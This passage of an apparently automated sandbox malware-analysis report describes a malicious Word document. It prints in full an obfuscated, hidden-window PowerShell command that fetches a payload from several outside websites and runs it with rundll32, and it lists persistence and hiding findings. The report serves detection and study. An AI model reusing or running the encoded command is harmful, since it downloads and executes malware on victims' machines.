QATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
                      Suspicious powershell command line foundShow sources
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10008085 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10004ADA push ecx; ret

                      Persistence and Installation Behavior:

                      barindex
                      Creates processes via WMIShow sources
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Shuwftk\rwhokf.exo:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Vngxkvjbqisigbn\asgkrazesikwug.frl:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Qzqgszcguiavsow\gdavyvbzxdoyhw.ift:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Gfhmd\pcib.aey:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Gwiivizeoc\rneajwbra.jdv:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Vshkfdgna\nswgiepj.iji:Zone.Identifier read attributes | delete
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
